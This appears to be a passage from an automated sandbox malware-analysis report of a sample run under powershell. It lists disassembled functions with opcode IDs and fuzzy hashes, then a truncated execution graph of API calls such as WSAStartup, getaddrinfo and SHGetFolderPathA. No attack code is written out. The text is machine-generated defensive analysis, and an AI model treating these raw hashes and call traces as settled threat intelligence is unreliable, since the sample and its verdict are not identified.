            • Instruction Fuzzy Hash: 7071C530A196458FD759DF3CA0253A57B92EF8F714F9887BEF099C62A3CA35A4428704
            Function 00007FF9C550A15D Relevance: .2, Instructions: 219COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c1cdf9164e62e9d2755702396a2a307392bfadf14995dafb1f6b7de82a7f2840
            • Instruction ID: 8c187425a4fa71c916399b0c03e9b8c7fb923077e7c3bfce52b3197d9c54d90c
            • Opcode Fuzzy Hash: c1cdf9164e62e9d2755702396a2a307392bfadf14995dafb1f6b7de82a7f2840
            • Instruction Fuzzy Hash: B471A4316196854FD359DF3CA0253657BD1FF8E318F5882BEE099D72A3CE35A8428B04
            Function 00007FF9C550C80D Relevance: .2, Instructions: 218COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 209c0f72df8473ed99965beef9e47d4b6e279b9e54d38725d2e3621d8f7872ec
            • Instruction ID: 1f16e5fc1a0fee150931c40849718908ce6a725ee96c4739e034dd29860f9239
            • Opcode Fuzzy Hash: 209c0f72df8473ed99965beef9e47d4b6e279b9e54d38725d2e3621d8f7872ec
            • Instruction Fuzzy Hash: A8712E31A28AC94FE795EF3CA4546657BE1FF8F229B5443ADF088C72A7C73494068700
            Function 00007FF9C550845D Relevance: .2, Instructions: 202COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2a81733560346b95df4965ac59611468f64dbcc3fbb5a69a53958cbd675d3535
            • Instruction ID: d6558aee8afb62d8a9359f40be22f38f9d704d9618116a9719e76a1efd358b28
            • Opcode Fuzzy Hash: 2a81733560346b95df4965ac59611468f64dbcc3fbb5a69a53958cbd675d3535
            • Instruction Fuzzy Hash: 6961CD31A28A8D4FE795EF3CA4546693BD1FF9F225F9443A9F088D72A7C67494068700
            Function 00007FF9C54FD494 Relevance: .2, Instructions: 199COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 944073f7ba7311500c23fa38df474319e38b2e56ebdb63cf00c57a06526c98a8
            • Instruction ID: 192e0c47c7466cf0688d091afe409d22bd22d388aacc04fbaff021d3e88229ac
            • Opcode Fuzzy Hash: 944073f7ba7311500c23fa38df474319e38b2e56ebdb63cf00c57a06526c98a8
            • Instruction Fuzzy Hash: 4251B570A2CA858FD358EF38945526AB7D1FF8D315F1546BEE08DC7293CE35A8028B41
            Function 00007FF9C5500E65 Relevance: .2, Instructions: 195COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f724db6d060b0dd0e3d4df60ad9495aceec5a36322d22637d46a31df4658c909
            • Instruction ID: ace4b3b438de740df8b0967faf56502ff9dfff9a737d53c484843869cce19f97
            • Opcode Fuzzy Hash: f724db6d060b0dd0e3d4df60ad9495aceec5a36322d22637d46a31df4658c909
            • Instruction Fuzzy Hash: A851F831A2C7858FD359EF348855239B7D2EF8A605B4586BED04AC7293CE39B842CB41
            Function 00007FF9C550C05D Relevance: .2, Instructions: 180COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 68dbf586396d3d8ad365f426529ba75c0d63c6fada65dcfb2f841720ab73dd71
            • Instruction ID: c1187eac00764a2cce5ba06a55c1a80d51a034423280c258e4e7d4a683b56452
            • Opcode Fuzzy Hash: 68dbf586396d3d8ad365f426529ba75c0d63c6fada65dcfb2f841720ab73dd71
            • Instruction Fuzzy Hash: 1351D531A286894FE759DF3CA425769BBD1FF8B714B5443BDE099C72A3DA35E8028700
            Function 00007FF9C550631D Relevance: .2, Instructions: 167COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f4b89cb04ba409a24bc96a5a27a8fa521deb0bc70524268480bb498d9c9df6d4
            • Instruction ID: cbd322b507a8fffe51f325038e25235e0cad6054bf0d1fe69c789314478b34a1
            • Opcode Fuzzy Hash: f4b89cb04ba409a24bc96a5a27a8fa521deb0bc70524268480bb498d9c9df6d4
            • Instruction Fuzzy Hash: 695126306196858FD756EF3CA4256757FE1EF8B614B5886EDE089C72A3CA34A8068700
            Function 00007FF9C550B2BB Relevance: .2, Instructions: 163COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d2e66855341fddebc813a6f7083444ccecf796cd07178233d23fbcf63b03ab19
            • Instruction ID: 6c0a9bfd0ccab44a3390522b373b946f55742c85818f4737037465e6d6ce8bda
            • Opcode Fuzzy Hash: d2e66855341fddebc813a6f7083444ccecf796cd07178233d23fbcf63b03ab19
            • Instruction Fuzzy Hash: 695193307186899FD759EF3CA0657793BD2EF8F614F5842ADF089D72A3CA74A8068704
            Function 00007FF9C550B747 Relevance: .2, Instructions: 155COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d6c97032da32673f5307de88cd5c96f5ab0af2ba0142f9cede8f2e05437fdd37
            • Instruction ID: 3e4b1258506832b0ce35c3165b145706e4c81a0965629c089b2ef4b4d54bc22d
            • Opcode Fuzzy Hash: d6c97032da32673f5307de88cd5c96f5ab0af2ba0142f9cede8f2e05437fdd37
            • Instruction Fuzzy Hash: BE519A71A2498D4FE795EF3C90546693BE2EF8F215F9853A9B088D7267C63498068700
            Function 00007FF9C5501179 Relevance: .2, Instructions: 154COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 682e8ce4afda5cb55e786ae490a42ff2406ed416c29fadd4c8b531a1456a93c6
            • Instruction ID: 5a1d45bc90b5839833f4ad93337d2516e2224a0c2930f2ac1b604206f305de7d
            • Opcode Fuzzy Hash: 682e8ce4afda5cb55e786ae490a42ff2406ed416c29fadd4c8b531a1456a93c6
            • Instruction Fuzzy Hash: 8E413370B28A498FD799EF38401536AB2D2EF8D705F5186BDD04EC63A6DE79E4028B01
            Function 00007FF9C5500459 Relevance: .2, Instructions: 154COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ecf3e395b6555c15a2d91db4febb385a0bb471c85db89df7e291e7b52cfe6b20
            • Instruction ID: de696ec62f2b9fedecdf1510eb7dfd4d6fae47778d55734b878fae23b36c8b61
            • Opcode Fuzzy Hash: ecf3e395b6555c15a2d91db4febb385a0bb471c85db89df7e291e7b52cfe6b20
            • Instruction Fuzzy Hash: 2A413370B28A498FD799EF38401536AB2D2EF8D705F5186BDD04EC63A6DE79E4028B01
            Function 00007FF9C55070DD Relevance: .1, Instructions: 140COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5bca9e39f6cd543172e79275a002247b82e1d927b11b51217b9187e1e8854c96
            • Instruction ID: ae57282957dbfbe5b38953eb058c29ecf27f1310c778778ea25c4397aea7e023
            • Opcode Fuzzy Hash: 5bca9e39f6cd543172e79275a002247b82e1d927b11b51217b9187e1e8854c96
            • Instruction Fuzzy Hash: 7841EA31B29A8A4FE754DF3C941527677D2EB8A615B5887BDE099C32A2DF35E4028700
            Function 00007FF9C55072FD Relevance: .1, Instructions: 139COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 36922083e2502ad9427d84147de7e97967964f91d6b4e265783024ff948b7fc1
            • Instruction ID: 39a3137647895890f14d72770cde5fe8a8acc82801d62cf64b23581b0805fef1
            • Opcode Fuzzy Hash: 36922083e2502ad9427d84147de7e97967964f91d6b4e265783024ff948b7fc1
            • Instruction Fuzzy Hash: 2741E831B286894FD754EF3CA4156767BD2EF8B615B5887BAE099C2293DE34E4028700
            Function 00007FF9C550CD7D Relevance: .1, Instructions: 138COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 29bd9dd7faf729649bdc5935004826faab50d06d92ed1dd6a0f8d06da44054a1
            • Instruction ID: 78cc932ea0aacb908326d9fdb9b7a3672d328d2792a634e7ad0bc198421a6c33
            • Opcode Fuzzy Hash: 29bd9dd7faf729649bdc5935004826faab50d06d92ed1dd6a0f8d06da44054a1
            • Instruction Fuzzy Hash: C741E631728A894FE755DF3C94113A67BD1EF8B614B5883BDE099C32D2DB35E8028744
            Function 00007FF9C5507E55 Relevance: .1, Instructions: 131COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7425916776110b2863937e71945ba75e51402e65f14f3a598ddefd3cb268b0b7
            • Instruction ID: 34bdc912cba85c363ac47aa51eed7f0bb65bbb4e4b9779fa64070aa1f06f3b5a
            • Opcode Fuzzy Hash: 7425916776110b2863937e71945ba75e51402e65f14f3a598ddefd3cb268b0b7
            • Instruction Fuzzy Hash: D341B631A186C94FD356DF3C94152657BE2FF9F259B2982FDD089CB263DA35A8078B00
            Function 00007FF9C550751D Relevance: .1, Instructions: 128COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 87c3be90017ea13b521253bfedd0f0975e40671cd853e53d94f902229e40933e
            • Instruction ID: 7dedd184592a59808934852b5706e7dd45d7e018e0ee0e27d75461d68100c2c8
            • Opcode Fuzzy Hash: 87c3be90017ea13b521253bfedd0f0975e40671cd853e53d94f902229e40933e
            • Instruction Fuzzy Hash: E631F931B2868A4FD758DF3C941567677D2EFCB615B5887BEE099C22A2DF34E4028700
            Function 00007FF9C550C355 Relevance: .1, Instructions: 119COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8ded96696f375be123b296909e992328ada73c9b5267760c85056cd94a8255f6
            • Instruction ID: ebbc4981737ef8d4ce2cf64d03b4bc09d2fa4cafa38ee30581353648dcf749bf
            • Opcode Fuzzy Hash: 8ded96696f375be123b296909e992328ada73c9b5267760c85056cd94a8255f6
            • Instruction Fuzzy Hash: F34171307286498FD759DF3C901576977D2EF8E619F6492BDA09AC72A3DE35E8028700
            Function 00007FF9C550D42B Relevance: .1, Instructions: 116COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8cbb017821cfbac05c02ea4f836afff80f4feff09ea3766be5059ea8969c4c96
            • Instruction ID: d97fde04a24e4685a1d3a62b9f37432e3428d3810a0a3860147306bd2fcbd4e0
            • Opcode Fuzzy Hash: 8cbb017821cfbac05c02ea4f836afff80f4feff09ea3766be5059ea8969c4c96
            • Instruction Fuzzy Hash: 67318331B285498FD758EF3C90116697793EFCF615B9982BDA09AC32A7DE35E4038700
            Function 00007FF9C5506A7B Relevance: .1, Instructions: 108COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cd506e9aef9eb2c784b149aa50c01ba74c440238017dee40619811a609823a25
            • Instruction ID: 461c54f4405d2440ae76932f6b628daa9c32019c942415a88e16cbb7ac39fe7c
            • Opcode Fuzzy Hash: cd506e9aef9eb2c784b149aa50c01ba74c440238017dee40619811a609823a25
            • Instruction Fuzzy Hash: D6310830B285894FE758EF38941137677D2EF8A604B9586BDE09AC7297CE35E4038700
            Function 00007FF9C5506DFB Relevance: .1, Instructions: 96COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b057c02254252046cef137b5a8add6d6ec49fc10f4d71e55e4735fed51d00976
            • Instruction ID: c43b7708f5cd8570bebcbe4316e0263455dc9cb3b455b233850714be340a65df
            • Opcode Fuzzy Hash: b057c02254252046cef137b5a8add6d6ec49fc10f4d71e55e4735fed51d00976
            • Instruction Fuzzy Hash: B1318431B285898FD758EF38941167A77D3EBCF619B95827DA099C3297DE35E4038700
            Function 00007FF9C5507ABB Relevance: .1, Instructions: 95COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 05ee7a6fe947b422eb96dd5c1b045963839a5f069067174ac9ff06b663a6c721
            • Instruction ID: e0d0951fccab9c2c4926e3b5650613d42cca85a98a99b7d4ee518e630178034d
            • Opcode Fuzzy Hash: 05ee7a6fe947b422eb96dd5c1b045963839a5f069067174ac9ff06b663a6c721
            • Instruction Fuzzy Hash: EE31C931B285898FD759EF3894156797BD2EF8F609B5486BDE099C72A3DE34E4038700
            Function 00007FF9C550538B Relevance: .1, Instructions: 86COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: da76d553e89ee7ea320f1cb5e0fb324cf2b499cffa2e52f29ea1c16593c5d010
            • Instruction ID: 5a36ee2b735c73de2b2b98e580321c9eeebacddcc303472f2c34e0450d438f8d
            • Opcode Fuzzy Hash: da76d553e89ee7ea320f1cb5e0fb324cf2b499cffa2e52f29ea1c16593c5d010
            • Instruction Fuzzy Hash: 5A218231B289498FE759EF3850153797792EBCF615F9982BDA09AC62A7DE34E4028700

            Execution Graph

            Execution Coverage:1.2%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0.3%
            Total number of Nodes:1016
            Total number of Limit Nodes:45
            execution_graph 126528 7ffa2cef4218 126529 7ffa2cef4231 126528->126529 126530 7ffa2cef48a3 126529->126530 126531 7ffa2cef4a9a 126529->126531 126532 7ffa2cef425d 126529->126532 126619 7ffa2cf16230 126530->126619 126616 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126531->126616 126596 7ffa2cf020a0 126532->126596 126537 7ffa2cef4285 126539 7ffa2cef42e2 126537->126539 126540 7ffa2cef4a7f 126537->126540 126555 7ffa2cef428f 126537->126555 126542 7ffa2cef4434 126539->126542 126543 7ffa2cef42eb 126539->126543 126615 7ffa2cf01de0 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 126540->126615 126541 7ffa2cef49d9 126612 7ffa2cf01fb0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 126541->126612 126545 7ffa2cef4a56 126542->126545 126546 7ffa2cef443d 126542->126546 126605 7ffa2cf052a0 58 API calls Concurrency::details::SchedulerProxy::DeleteThis 126543->126605 126614 7ffa2cf05920 50 API calls Concurrency::details::SchedulerProxy::DeleteThis 126545->126614 126550 7ffa2cf020a0 32 API calls 126546->126550 126554 7ffa2cef4456 126550->126554 126551 7ffa2cef42f5 126551->126555 126568 7ffa2cef42fd 126551->126568 126553 7ffa2cef49f6 126553->126555 126556 7ffa2cef4a1f 126553->126556 126554->126555 126557 7ffa2cef445e 126554->126557 126555->126530 126618 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126555->126618 126556->126530 126613 7ffa2cf0c280 free realloc free Concurrency::details::SchedulerProxy::DeleteThis 126556->126613 126607 7ffa2cef2330 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126557->126607 126560 7ffa2cef4475 126560->126530 126608 7ffa2cf02880 fflush 126560->126608 126561 7ffa2cef357a 126561->126530 126563 7ffa2cef3b13 126561->126563 126564 7ffa2cef361d free 126561->126564 126566 7ffa2cef3bb2 126561->126566 126570 7ffa2cef3662 memset 126561->126570 126576 7ffa2cef36a3 _errno strtol 126561->126576 126578 7ffa2cf11830 12 API calls Concurrency::details::SchedulerProxy::DeleteThis 126561->126578 126581 7ffa2cef36f0 isspace 126561->126581 126582 7ffa2cf0e100 calloc calloc free getaddrinfo 126561->126582 126583 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126561->126583 126585 7ffa2cef3852 126561->126585 126580 7ffa2cef3b83 126563->126580 126602 7ffa2cef63c0 10 API calls 126563->126602 126564->126561 126609 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126566->126609 126567 7ffa2cef4d8e 126617 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126567->126617 126568->126561 126606 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126568->126606 126569 7ffa2cef3b61 126603 7ffa2cefae50 free free free free 126569->126603 126570->126561 126575 7ffa2cef3b69 126604 7ffa2cefe5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 126575->126604 126576->126566 126579 7ffa2cef36ce _errno 126576->126579 126578->126561 126579->126561 126579->126566 126580->126566 126580->126567 126581->126561 126582->126561 126583->126561 126584 7ffa2cef3911 calloc 126586 7ffa2cef48a8 126584->126586 126587 7ffa2cef392f 126584->126587 126585->126584 126585->126585 126610 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126586->126610 126588 7ffa2cef3998 126587->126588 126590 7ffa2cef3940 memcpy 126587->126590 126601 7ffa2cf0e290 free free freeaddrinfo 126588->126601 126590->126588 126590->126590 126591 7ffa2cef48b7 126611 7ffa2cf0e290 free free freeaddrinfo 126591->126611 126594 7ffa2cef48c4 126594->126530 126595 7ffa2cef39a5 126595->126563 126597 7ffa2cf020ad 126596->126597 126600 7ffa2cef426f 126596->126600 126598 7ffa2cf020b3 126597->126598 126597->126600 126628 7ffa2cefe7c0 32 API calls Concurrency::details::SchedulerProxy::DeleteThis 126598->126628 126600->126530 126600->126537 126600->126541 126601->126595 126602->126569 126603->126575 126604->126580 126605->126551 126606->126561 126607->126560 126608->126561 126609->126530 126610->126591 126611->126594 126612->126553 126613->126530 126614->126555 126615->126530 126616->126530 126617->126530 126618->126530 126620 7ffa2cf16239 126619->126620 126621 7ffa2cef4dc9 126620->126621 126622 7ffa2cf16664 IsProcessorFeaturePresent 126620->126622 126623 7ffa2cf1667c 126622->126623 126629 7ffa2cf16968 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 126623->126629 126625 7ffa2cf1668f 126630 7ffa2cf16630 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 126625->126630 126628->126600 126629->126625 126631 7ffa41835f70 126640 7ffa4186e0b0 126631->126640 126633 7ffa41835fbb 126634 7ffa418510b8 112 API calls 126635 7ffa41835f87 126634->126635 126635->126633 126635->126634 126636 7ffa41835fc6 Concurrency::cancel_current_task 126635->126636 126639 7ffa4186e0b0 102 API calls 126635->126639 126649 7ffa41853f98 RtlPcToFileHeader RaiseException 126636->126649 126638 7ffa41835fe1 126639->126635 126641 7ffa4186e111 126640->126641 126642 7ffa4186e0c1 126640->126642 126651 7ffa41866668 13 API calls memcpy_s 126641->126651 126642->126641 126643 7ffa4186e0ca 126642->126643 126648 7ffa4186e0e9 126643->126648 126650 7ffa41866668 13 API calls memcpy_s 126643->126650 126645 7ffa4186e116 126652 7ffa41866cf8 102 API calls _invalid_parameter_noinfo 126645->126652 126648->126635 126649->126638 126650->126648 126651->126645 126652->126648 126653 64941bd0 126654 64941bea 126653->126654 126656 64941bf7 126654->126656 126657 64941ac0 126654->126657 126658 64948890 126657->126658 126659 64941ad9 calloc 126658->126659 126660 64941b85 126659->126660 126661 64941aea CreateSemaphoreA CreateSemaphoreA 126659->126661 126660->126656 126662 64941b9d 126661->126662 126663 64941b4b 126661->126663 126664 64941ba2 CloseHandle 126662->126664 126665 64941bab 126662->126665 126666 64941b90 CloseHandle 126663->126666 126667 64941b50 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 126663->126667 126664->126665 126665->126656 126666->126662 126667->126660 126668 7ffa2cef4e55 126673 7ffa2cef3350 126668->126673 126670 7ffa2cef4e8b 126671 7ffa2cef4ea4 126670->126671 126683 7ffa2cef67a0 38 API calls 126670->126683 126684 7ffa2cefa090 126673->126684 126676 7ffa2cef336a 126676->126670 126678 7ffa2cef3380 126679 7ffa2cef3398 126678->126679 126709 7ffa2cef6ae0 126678->126709 126679->126670 126683->126671 126685 7ffa2cefa0b4 WSAStartup 126684->126685 126686 7ffa2cefa0cf WSASetLastError malloc 126684->126686 126687 7ffa2cefa0c8 126685->126687 126696 7ffa2cefa0ea 126685->126696 126688 7ffa2cefa0f1 memset malloc malloc malloc 126686->126688 126686->126696 126687->126686 126857 7ffa2cf0bca0 malloc 126688->126857 126690 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126692 7ffa2cef3362 126690->126692 126692->126676 126697 7ffa2cef6a20 126692->126697 126693 7ffa2cf0bca0 malloc 126694 7ffa2cefa1dd 126693->126694 126694->126696 126859 7ffa2cef9330 53 API calls Concurrency::details::SchedulerProxy::DeleteThis 126694->126859 126696->126690 126860 7ffa2cefa810 194 API calls 126697->126860 126699 7ffa2cef6a42 126700 7ffa2cef6a4a 126699->126700 126861 7ffa2cef9240 29 API calls Concurrency::details::SchedulerProxy::DeleteThis 126699->126861 126700->126678 126702 7ffa2cef6a6a 126703 7ffa2cef6a6e 126702->126703 126704 7ffa2cef6aac 126702->126704 126705 7ffa2cef6a96 free 126703->126705 126706 7ffa2cef6a81 free 126703->126706 126707 7ffa2cef6ab5 free 126704->126707 126708 7ffa2cef6aca free 126704->126708 126705->126678 126706->126705 126706->126706 126707->126707 126707->126708 126708->126678 126710 7ffa2cef6b10 calloc 126709->126710 126717 7ffa2cef6bc6 126710->126717 126824 7ffa2cef77e5 126710->126824 126713 7ffa2cef6da0 126716 7ffa2cf16230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126713->126716 126714 7ffa2cef6d50 126862 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126714->126862 126715 7ffa2cef6f97 126721 7ffa2cef7009 free 126715->126721 126727 7ffa2cef701b 126715->126727 126723 7ffa2cef338c 126716->126723 126724 7ffa2cef6c13 malloc 126717->126724 126733 7ffa2cef6c7d 126717->126733 126718 7ffa2cef6e2a free 126731 7ffa2cef6da5 126718->126731 126719 7ffa2cef6f2f 126730 7ffa2cef6f9e 126719->126730 126738 7ffa2cef6f99 126719->126738 126739 7ffa2cef6f3d 126719->126739 126864 7ffa2cef2860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 126721->126864 126722 7ffa2cef6d4b 126722->126714 126722->126731 126723->126679 126847 7ffa2cef68e0 126723->126847 126725 7ffa2cef6c46 126724->126725 126726 7ffa2cef6c33 memcpy 126724->126726 126725->126717 126725->126733 126725->126824 126726->126725 126727->126713 126736 7ffa2cef703e free _strdup 126727->126736 126742 7ffa2cef705b 126727->126742 126729 7ffa2cef6cd2 malloc 126734 7ffa2cef6cf8 memcpy 126729->126734 126735 7ffa2cef6d0b 126729->126735 126863 7ffa2cf02d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126730->126863 126731->126718 126732 7ffa2cef6e54 _strdup 126731->126732 126740 7ffa2cef6dff isalpha 126731->126740 126743 7ffa2cef6e7d 126731->126743 126732->126731 126732->126824 126733->126714 126733->126722 126733->126729 126733->126731 126734->126735 126735->126733 126746 7ffa2cef6d44 126735->126746 126735->126824 126736->126742 126736->126824 126737 7ffa2cef6ec3 malloc 126744 7ffa2cef6ef6 126737->126744 126745 7ffa2cef6ee3 memcpy 126737->126745 126738->126715 126738->126730 126739->126715 126747 7ffa2cef6f60 _strdup 126739->126747 126740->126731 126748 7ffa2cef707f memset SHGetFolderPathA 126742->126748 126753 7ffa2cef7190 126742->126753 126761 7ffa2cef7119 126742->126761 126743->126715 126743->126719 126743->126737 126744->126719 126744->126743 126744->126824 126745->126744 126746->126714 126746->126722 126747->126739 126747->126824 126750 7ffa2cef70b1 126748->126750 126748->126761 126749 7ffa2cef73b6 126751 7ffa2cef74c9 _strdup 126749->126751 126766 7ffa2cef73d8 126749->126766 126865 7ffa2cf11830 126750->126865 126754 7ffa2cef73f5 126751->126754 126751->126824 126753->126749 126756 7ffa2cef71df malloc 126753->126756 126759 7ffa2cef75c1 _strdup 126754->126759 126776 